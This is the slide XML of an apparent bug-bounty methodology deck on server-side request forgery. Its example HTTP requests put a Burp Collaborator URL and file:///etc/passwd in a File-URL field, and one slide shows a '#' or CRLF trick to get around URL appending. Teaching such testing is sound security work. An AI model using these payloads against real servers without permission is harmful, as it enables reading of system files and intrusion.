                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://id.burpcollaborator.net</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Google Shape;279;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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80" name="Google Shape;280;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="282" name="Google Shape;282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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181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46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Blog</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="284" name="Google Shape;284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4025" y="2675525"/>
            <a:ext cx="421000" cy="36510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46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="286" name="Google Shape;286;p4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64025" y="3091500"/>
            <a:ext cx="421000" cy="347900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46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3460050"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="288" name="Google Shape;288;p4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64025" y="3537325"/>
            <a:ext cx="421000" cy="347900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46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3879475"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="290" name="Google Shape;290;p4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22925" y="3939538"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Append </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%0d%0aX:%20 To Your Domain e.g. https://id.burpcollaborator.net# </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Appending Anything After URL</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;296;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://id.burpcollaborator.net#</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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98" name="Google Shape;298;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="300" name="Google Shape;300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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181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47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="302" name="Google Shape;302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2925" y="3110050"/>
            <a:ext cx="503200" cy="365100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47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="304" name="Google Shape;304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2925" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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None/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file:///etc/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Content Of etc/passwd If There Is SSRF</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Google Shape;310;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number</a:t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EFEFE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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file:///</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Google Shape;311;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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434343"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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12" name="Google Shape;312;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="314" name="Google Shape;314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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181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48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="316" name="Google Shape;316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8350" y="2675525"/>
            <a:ext cx="503200" cy="365100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48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="318" name="Google Shape;318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2925" y="3073200"/>
            <a:ext cx="503200" cy="365100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48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3460050"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="320" name="Google Shape;320;p4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64025" y="3537325"/>
            <a:ext cx="421000" cy="34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dern Writer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1AFD1"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F8E71C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